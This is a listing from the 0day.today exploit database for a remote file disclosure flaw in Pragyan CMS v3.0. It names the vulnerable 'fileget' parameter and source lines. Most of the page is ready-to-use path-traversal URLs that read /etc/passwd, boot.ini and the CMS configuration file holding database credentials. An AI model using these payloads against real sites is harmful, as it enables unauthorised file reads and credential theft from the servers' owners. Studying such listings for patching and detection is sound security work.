[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Pragyan CMS v 3.0 Remote File Disclosure

Author
Or4nG.M4N
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-17362
Category
web applications
Date add
10-01-2012
Platform
php
Title   
Pragyan CMS v 3.0 => [Remote File Disclosure]
Author  
Or4nG.M4n
Download
http://space.dl.sourceforge.net/project/pragyan/pragyan/3.0/PragyanCMS-v3.0-beta.tar.bz2
 
vuln
download.lib.php line 16
vuln
index.php line 234
 
$_GET['fileget']
  
exploit  http://localhost/Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../  etc/passwd . boot.ini
 
Download Config file
exploit  /Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../appserv/www/Pragyan/cms/config.inc.php
exploit  /Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../home/exploitdb/public_html/Pragyan/cms/config.inc.php



#  0day.today [2024-06-30]  #